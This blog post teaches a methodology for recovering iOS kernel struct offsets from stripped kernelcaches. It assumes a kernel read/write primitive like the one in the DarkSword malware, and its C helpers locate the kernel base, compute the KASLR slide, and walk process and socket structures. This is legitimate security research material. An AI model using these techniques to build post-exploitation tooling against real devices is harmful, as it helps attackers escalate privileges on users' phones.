Opa334 recently shared a kernel read and write primitive similar to the one used in the DarkSword malware. It was the perfect occasion for me to get it running on one of my testing devices and actually get my hands dirty with kernel exploration. We always hear about kernel exploitation, but rarely get to walk through what it looks like in practice.
Once you have read and write primitives to the kernel, the first step is to read backward until you find the magic number aka the Mach-O binary signature:
```c
uint64_t magic = early_kread64(kernel_base);
if (magic == 0x100000cfeedfacf) {
    printf("[DEBUG] Found Mach-O magic at 0x%llx!\n", kernel_base);
}
```
Then you can compute the kernel slide and you are good to go.
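To make that concrete, here is a minimal sketch of the backward scan and the slide computation. The helper names (`read64`, `find_kernel_base`, `kaslr_slide`) and the simulated memory are mine, not DarkSword's; on a real device, `read64` would wrap your kernel read primitive.

```c
#include <stdint.h>
#include <string.h>

/* The 64-bit word at the kernel base: MH_MAGIC_64 (0xfeedfacf) in the
 * low half, CPU_TYPE_ARM64 (0x0100000c) in the high half. */
#define MACHO_ARM64_QWORD 0x0100000cfeedfacfULL
#define KPAGE 0x1000ULL

/* Simulated kernel memory so the logic can run anywhere; on device,
 * read64() would be the kernel read primitive instead. */
const uint8_t *g_mem;
uint64_t g_mem_base;

static uint64_t read64(uint64_t addr) {
    uint64_t v;
    memcpy(&v, g_mem + (addr - g_mem_base), sizeof v);
    return v;
}

/* Walk backward, page by page, from any leaked kernel pointer until
 * the Mach-O header appears: that page is the runtime kernel base. */
uint64_t find_kernel_base(uint64_t leaked_ptr) {
    uint64_t addr = leaked_ptr & ~(KPAGE - 1);
    while (read64(addr) != MACHO_ARM64_QWORD)
        addr -= KPAGE;
    return addr;
}

/* KASLR slide = runtime base minus the static base from the IPSW. */
uint64_t kaslr_slide(uint64_t runtime_base, uint64_t static_base) {
    return runtime_base - static_base;
}
```

Everything downstream (globals, struct fields) is then addressed as `static_address + slide`.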
I won't detail this here; feel free to check MATTEYEUX's blog post on DarkSword.
The next difficulty is finding the offsets between this magic value and the kernel objects in memory. That is exactly what this post is about.
Kernelcaches extracted from IPSW files come without symbols: just raw ARM64 code. Yet, the internal layout of every kernel data structure is recoverable if you know where to look.
Note: you can use blacktop/symbolicator to recover some symbols and make your life easier.
It reminds me of this sentence from J. Levin in the DisARM book:
[...] In fact, the whole premise of the command line tools I demonstrate is to avoid having to use a debugger.
I tried to push hard on that path...
This guide documents a repeatable methodology for extracting struct offsets from stripped kernelcaches. The techniques here were validated against iOS 16.7.12 (iPhone X, build 20H364) using Binary Ninja.
I voluntarily chose not to use the Kernel Development Kit, to force myself to work directly from ARM assembly.
(I used the ipsw tool for kernelcache extraction.) Also, the pseudo (non-ARM) code that I'll share with you has been modified and simplified for this post.
The key insight behind this entire methodology is that functions like proc_pid(), vnode_mount(), or kauth_cred_getuid() are wrappers that read the field from a struct. When decompiled, they directly reveal the field's offset.
A stripped kernelcache still retains the names of these exported functions.
The XNU kernel source is partially open. While the iOS build may differ from the published source, the struct layouts are usually very close. Use the source as a map, not as ground truth.
For example, the accessor `_proc_pid` maps directly to the field `p_pid`, declared in `bsd/sys/proc_internal.h`. The main structs and their header files:

| Struct | Header file |
|---|---|
| `proc` | `bsd/sys/proc_internal.h` |
| `vnode` | `bsd/sys/vnode_internal.h` |
| `socket` | `bsd/sys/socketvar.h` |
| `ucred` | `bsd/sys/ucred.h` |
| `task` | `osfmk/kern/task.h` |
| `thread` | `osfmk/kern/thread.h` |
| `filedesc` | `bsd/sys/filedesc.h` |
| `fileproc` | `bsd/sys/file_internal.h` |
| `fileglob` | `bsd/sys/file_internal.h` |
| `mount` | `bsd/sys/mount_internal.h` |
Apple frequently adds, removes, or reorders fields between iOS versions. Never assume the open-source layout matches exactly. The source tells you what fields exist; the binary tells you where they are.
For example, proc_ro (a read-only split of proc fields) exists in iOS 15.2+ but is not in older XNU source releases. If you only read the source, you would miss this entirely.
Global variables like allproc, kernproc, and nprocs are stored in the __DATA segment. They are referenced by functions via adrp/ldr instruction pairs. Finding these gives you entry points into the kernel's data structures from a known address.
ARM64 uses page-relative addressing:
```asm
adrp x8, 0xfffffff0078b7000   ; load page base
ldr  x8, [x8, #0x728]         ; load from page + offset
                              ; → effective address: 0xfffffff0078b7728
```
This is a load of the global variable at 0xfffffff0078b7728, which in the context of proc_iterate is allproc.
All addresses in the static binary are pre-slide. At boot, the kernel is loaded at a random offset (the KASLR slide). On a live device, the actual addresses will be static_address + slide. The offsets between globals remain constant.
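The arithmetic is simple enough to capture in two helpers (names are mine, for clarity):

```c
#include <stdint.h>

/* adrp resolves to a 4 KB page (low 12 bits cleared); the paired ldr
 * then adds an unsigned byte offset to reach the global. */
uint64_t global_static_addr(uint64_t adrp_page, uint64_t ldr_off) {
    return (adrp_page & ~0xFFFULL) + ldr_off;
}

/* On a live device, every static address must be rebased by the slide. */
uint64_t slid_addr(uint64_t static_addr, uint64_t kaslr_slide) {
    return static_addr + kaslr_slide;
}
```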
Search for functions whose names follow the pattern <struct>_<field> or <struct>_get<field>. These are almost always thin accessors.
An accessor function decompiles to essentially one operation:
```c
// _proc_pid at 0x5c892c
return *(arg1 + 0x60);
```
Or in ARM64 assembly:
```asm
ldr w0, [x0, #0x60]
ret
```
That single load instruction tells you: struct proc has p_pid at offset +0x60, and it is a 32-bit integer because the instruction is ldr w0, not ldr x0.
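Once an accessor has given up its offset, you can mirror it through your read primitive. A minimal sketch (the offset is the one recovered on this build; `kread32` is simulated over a local buffer here, but on device it would be the real primitive):

```c
#include <stdint.h>
#include <string.h>

#define PROC_P_PID_OFF 0x60  /* recovered from _proc_pid on this build */

/* Stand-in for a real kread32 primitive: "kernel memory" here is just
 * a local buffer passed in directly. */
static uint32_t kread32(const uint8_t *base, uint64_t off) {
    uint32_t v;
    memcpy(&v, base + off, sizeof v);
    return v;
}

/* Reimplementation of what _proc_pid does, via the read primitive. */
uint32_t proc_pid_via_offset(const uint8_t *proc) {
    return kread32(proc, PROC_P_PID_OFF);
}
```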
For example, given a target struct, search the function list for its name:
| Target struct | Search patterns |
|---|---|
| `proc` | `proc_pid`, `proc_ppid`, `proc_ucred`, `proc_name`, `proc_task` |
| `vnode` | `vnode_vtype`, `vnode_mount`, `vnode_vid`, `vnode_fsnode`, `vnode_getname` |
| `ucred` | `kauth_cred_getuid`, `kauth_cred_getgid`, `kauth_cred_getruid` |
| `task` | `get_task_map`, `get_bsdtask_info`, `task_reference` |
| `socket` | `file_socket`, `soisconnecting`, `soisconnected` |
| `mount` | `vfs_flags`, `vfs_statfs` |
As an example, take `struct ucred`. Search for functions containing `kauth_cred_get`:
- `_kauth_cred_getuid` → `return *(arg1 + 0x18)` → `cr_uid` at +0x18
- `_kauth_cred_getruid` → `return *(arg1 + 0x1C)` → `cr_ruid` at +0x1C
- `_kauth_cred_getsvuid` → `return *(arg1 + 0x20)` → `cr_svuid` at +0x20
- `_kauth_cred_getgid` → `return *(arg1 + 0x28)` → `cr_gid` at +0x28
- `_kauth_cred_getrgid` → `return *(arg1 + 0x68)` → `cr_rgid` at +0x68
- `_kauth_cred_getsvgid` → `return *(arg1 + 0x6C)` → `cr_svgid` at +0x6C
Decompilers sometimes introduce confusing array-indexing notation. When the decompiler shows `arg1[0x15a]`, the actual byte offset depends on the element type it inferred for `arg1`: the expression means `arg1 + 0x15a * sizeof(element)`. The ARM64 instruction, by contrast, shows the real byte offset:
```asm
; 0x5c9a40
add x0, x0, #0x579   ; this is the actual byte offset
```
When in doubt, read the assembly instructions: they are always the ground truth.
When accessor functions do not exist for a field (many internal fields are never exported), look at functions that iterate or construct instances of the struct. These functions touch many fields and reveal the overall layout.
Functions named *_iterate, *_foreach, or *_walk traverse linked lists of kernel objects. They reveal:
- the list-entry offset: often +0x00 for the primary list, but a struct can have multiple list entries at different offsets (e.g. `proc.p_list` at +0x00 vs `proc.p_hash` at +0xA0)
- global list heads and counters (e.g. `nprocs`, in `proc_iterate`)

Take `proc_iterate`. This single function revealed:
| What | How | Value |
|---|---|---|
| `allproc` global | First data reference loaded as list head | `0xfffffff0078b7728` |
| `zombproc` global | Second list head (conditional on flags) | `0xfffffff0078b7730` |
| `nprocs` global | Loop bound variable | `0xfffffff0078b7d00` |
| `p_list.le_next` | `i = *i` (following the list) | +0x00 |
| `p_pid` | Stored into pidlist array | +0x60 |
| `p_stat` | Compared against 1 (zombie filter) | +0x64 |
| `p_listflag` | Reference count manipulation | +0x464 |
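With just these two offsets, a proc lookup by PID needs nothing but the read primitive. A sketch with kernel memory simulated by local buffers (so "addresses" are ordinary pointers in this process); the helper names and the simulation are mine:

```c
#include <stdint.h>
#include <string.h>

#define P_LIST_OFF 0x00  /* p_list.le_next, from proc_iterate */
#define P_PID_OFF  0x60  /* p_pid, from _proc_pid             */

/* Simulated read primitives: addresses are ordinary pointers here. */
static uint64_t kread64(uint64_t addr) {
    uint64_t v; memcpy(&v, (const void *)(uintptr_t)addr, sizeof v); return v;
}
static uint32_t kread32(uint64_t addr) {
    uint32_t v; memcpy(&v, (const void *)(uintptr_t)addr, sizeof v); return v;
}

/* Follow p_list.le_next from the allproc head until p_pid matches. */
uint64_t find_proc_by_pid(uint64_t allproc_addr, uint32_t pid) {
    for (uint64_t p = kread64(allproc_addr); p != 0; p = kread64(p + P_LIST_OFF))
        if (kread32(p + P_PID_OFF) == pid)
            return p;
    return 0;  /* not found */
}
```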
Functions named *create*, *init*, or *alloc* initialize struct fields. They often set fields sequentially, revealing the struct layout in order.
For instance, the socket creation routine `socreate_internal` revealed over 20 struct fields by tracing the sequential stores to the newly allocated socket:
```c
// x21 = newly allocated socket
*(x21 + 0x18)  = protosw;           // so_proto
*(x21 + 0x1e0) = kauth_cred;        // so_cred
*(x21 + 0x1e4) = proc_pid(p);       // so_last_pid
*(x21 + 0x1e8) = proc_uniqueid(p);  // so_last_upid
*(x21 + 0x288) = tpidr_el1;         // so_background_thread
```
Other things to watch for in these routines:

- calls to accessors (e.g. `proc_pid()`) whose return value is stored
- `memcpy` calls that reveal embedded sub-structures
- `str xzr` (storing zero) to initialize pointer fields

When neither accessors nor iterators exist for a field, look at the syscall implementations that operate on the struct. Syscalls are the boundary between userspace and kernel space; they must read and write kernel structs to do their work.
XNU syscall implementations follow the pattern sys_<name> or just <name> for older BSD syscalls:
| Syscall | Function name | Reveals |
|---|---|---|
| `chdir(2)` | `sys_chdir` | `filedesc.fd_cdir` offset |
| `chroot(2)` | `chroot` | `filedesc.fd_rdir` offset, chroot flag |
| `open(2)` | `vn_open_auth` | `fileproc`/`fileglob` chain |
| `fchdir(2)` | `sys_fchdir` | `filedesc` locking pattern |
For example, we can reach some fields of `proc` via `sys_chdir`.
The chdir syscall must update the current working directory. Decompiling it reveals:
```c
IORWLockWrite(proc + 0x128);           // fd_rw_lock
old = *(proc + 0x118);                 // fd_cdir (old value)
*(proc + 0x118) = new_vnode;           // fd_cdir = new directory
lck_rw_unlock_exclusive(proc + 0x128);
if (old != NULL)
    vnode_rele(old);
```
This gives us three offsets from one function:
- `proc + 0x118` = `fd_cdir`
- `proc + 0x128` = `fd_rw_lock`
- the `filedesc` fields sit directly inside `proc` (no intermediate pointer)

A critical question when mapping any struct: is sub-struct X a pointer to a separate allocation, or is it embedded inline?
The answer comes from how the code accesses it. If you see:
```c
// Pointer to separate struct:
fd   = *(proc + SOME_OFFSET);  // load a pointer
cdir = *(fd + 0x18);           // dereference through it

// Inline (embedded):
cdir = *(proc + 0x118);        // direct access, no intermediate load
```
If there is no intermediate pointer load, the sub-struct is inline. This is exactly what we found for filedesc inside proc: the fields are at direct offsets from the proc base.
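The same distinction can be shown with toy C structs (illustrative only, not the real XNU layouts): with an embedded sub-struct, `offsetof` reaches the inner field at a fixed constant, exactly what the single-load access pattern implies.

```c
#include <stddef.h>

struct inner { long a; long b; };

/* One extra pointer load is needed to reach inner fields. */
struct holds_pointer { long x; struct inner *sub; };

/* Inner fields sit at fixed direct offsets from the outer base. */
struct holds_inline  { long x; struct inner sub; };
```

Here `offsetof(struct holds_inline, sub.b)` is a plain compile-time constant, while reaching `b` through `struct holds_pointer` always costs a dereference; that is the difference the disassembly makes visible.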
zone_require() and zone_id_require_ro() are used to validate that pointers belong to the correct memory zone. These checks reveal what zone a struct lives in and whether it is read-only.
When you see code like this:
```c
// Inside _proc_ucred:
x1 = *(arg1 + 0x18);              // load proc_ro pointer
zone_id_require_ro_panic(5, x1);  // validate it belongs to zone #5
```
Then we can deduce:
- `proc + 0x18` is a pointer to another struct (`proc_ro`)
- that struct lives in a read-only zone, zone #5 (hence the `_ro` suffix)

By collecting all `zone_id_require_ro_panic` calls across the kernelcache, you can build a complete map of protected zones:
| Zone ID | Struct | Protection |
|---|---|---|
| 3 | `thread_ro` | read-only |
| 5 | `proc_ro` | read-only |
| 7 | `ucred` | read-only |
| 0x17 | `proc` | regular `zalloc` (with `zone_require`) |
Understanding which structures are in read-only zones tells you about the kernel's security architecture. Fields that Apple moved into proc_ro are protected and cannot be modified even with a kernel read/write primitive.
Individual functions rarely traverse more than one or two pointer hops. But by combining offsets discovered in different functions, you can build paths between objects that have no direct accessor.
For example, there is no socket_get_proc() in the KPI — you cannot find the owning process of a socket with a single function search. But the path exists if you chain discoveries from earlier phases:
From socreate_internal (Phase 2): socket + 0x288 stores the creating thread (tpidr_el1)
From _current_proc (Phase 1): thread + 0x350 → thread_ro, then thread_ro + 0x10 → proc
```
socreate_internal      _current_proc        _current_proc       _proc_pid
found in Phase 2       found in Phase 1     found in Phase 1    found in Phase 1
      │                      │                    │                  │
      ▼                      ▼                    ▼                  ▼
┌──────────┐ +0x288 ┌────────────┐ +0x350 ┌────────────┐ +0x10 ┌──────────┐ +0x60
│  socket  │ ─────→ │   thread   │ ─────→ │ thread_ro  │ ────→ │   proc   │ ────→ p_pid
└──────────┘        └────────────┘        └────────────┘       └──────────┘
 (tpidr_el1)                               (zone RO #3)
```
Neither function knows about the other. But combining them gives you a three-hop path from any socket to its owning process — something you could never find by searching function names alone.
This is where the work becomes cumulative: every offset you confirmed in Phases 1–5 is a building block. The more you have, the more paths you can construct.
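Chained together, the path from the diagram reduces to four reads. A sketch under the same simulation caveat as before (the offsets are this build's; on device, `kread64`/`kread32` would be your real primitives):

```c
#include <stdint.h>
#include <string.h>

/* Offsets recovered in earlier phases (iOS 16.7.12 in this post). */
#define SO_THREAD_OFF 0x288  /* socket -> creating thread (tpidr_el1) */
#define TH_RO_OFF     0x350  /* thread -> thread_ro                   */
#define RO_PROC_OFF   0x010  /* thread_ro -> proc                     */
#define P_PID_OFF     0x060  /* proc -> p_pid                         */

/* Simulated read primitives: addresses are ordinary pointers here. */
static uint64_t kread64(uint64_t addr) {
    uint64_t v; memcpy(&v, (const void *)(uintptr_t)addr, sizeof v); return v;
}
static uint32_t kread32(uint64_t addr) {
    uint32_t v; memcpy(&v, (const void *)(uintptr_t)addr, sizeof v); return v;
}

/* socket -> thread -> thread_ro -> proc -> p_pid */
uint32_t socket_owner_pid(uint64_t so) {
    uint64_t thread    = kread64(so + SO_THREAD_OFF);
    uint64_t thread_ro = kread64(thread + TH_RO_OFF);
    uint64_t proc      = kread64(thread_ro + RO_PROC_OFF);
    return kread32(proc + P_PID_OFF);
}
```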
Some kernel lookups use hash tables instead of linked lists. The hash function and table structure can be recovered from the lookup function.
`_proc_find` takes a PID and returns the corresponding `proc`. Decompiling it reveals:
The hash entry lives at proc + 0xA0, which means the proc struct has a LIST_ENTRY at that offset for chaining in the hash table. The PID comparison happens at hash_entry - 0xA0 + 0x60, confirming p_pid at +0x60 from another angle.
If you find proc_pid at +0x60, proc_ppid at +0x20, and proc_pgrpid at +0x28, you know the PID-related fields are clustered in the +0x20–0x68 region. This helps you predict where other related fields might be, and focus your search.
A related trick is `zalloc_ro_mut`. When `zalloc_ro_mut(zone_id, ptr, offset, src, size)` is called, the `size` parameter tells you the total size of the read-only struct. For example, `proc_ro` is 0x80 bytes.
| Instruction | What it tells you |
|---|---|
| `ldr x0, [x1, #0x60]` | 64-bit load from offset 0x60 |
| `ldr w0, [x1, #0x60]` | 32-bit load from offset 0x60 |
| `ldrh w0, [x1, #0x70]` | 16-bit load from offset 0x70 |
| `ldrb w0, [x1, #0x64]` | 8-bit load from offset 0x64 |
| `str x2, [x1, #0x18]` | 64-bit store at offset 0x18 |
| `add x0, x1, #0x579` | Compute address at offset 0x579 (often for strings/arrays) |
| `stp x2, x3, [x1, #0x50]` | Store pair: 64-bit values at +0x50 and +0x58 |
| `adrp x8, PAGE` then `ldr x8, [x8, #OFF]` | Global variable load at PAGE+OFF |
| `mrs x0, tpidr_el1` | Load current thread pointer |
The ARM64 instruction tells you the field size:
- `ldr x` / `str x` → 8 bytes (pointer, uint64)
- `ldr w` / `str w` → 4 bytes (int32, uint32, pid_t)
- `ldrh` / `strh` → 2 bytes (uint16, short)
- `ldrb` / `strb` → 1 byte (uint8, char, bool)
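This size/offset extraction is mechanical enough to automate. A sketch that decodes only the "LDR (immediate, unsigned offset)" family shown in the table (my helper, not a full disassembler; other addressing modes would need their own cases):

```c
#include <stdint.h>

/* Decode an ARM64 LDRB/LDRH/LDR-w/LDR-x "unsigned immediate" load:
 * size(2) 111 0 01 01 imm12 Rn(5) Rt(5). Returns the access size in
 * bytes (0 if the word is not this encoding) and writes the byte
 * offset, which is imm12 scaled by the access size. */
unsigned decode_ldr_uimm(uint32_t insn, unsigned *byte_off) {
    if ((insn & 0x3FC00000u) != 0x39400000u)
        return 0;                        /* not LDR (unsigned imm) */
    unsigned size  = insn >> 30;         /* 0=B, 1=H, 2=W, 3=X     */
    unsigned imm12 = (insn >> 10) & 0xFFFu;
    *byte_off = imm12 << size;
    return 1u << size;
}
```

For example, `0xB9406000` (`ldr w0, [x0, #0x60]`) decodes to a 4-byte load at offset 0x60, matching the `p_pid` accessor seen earlier.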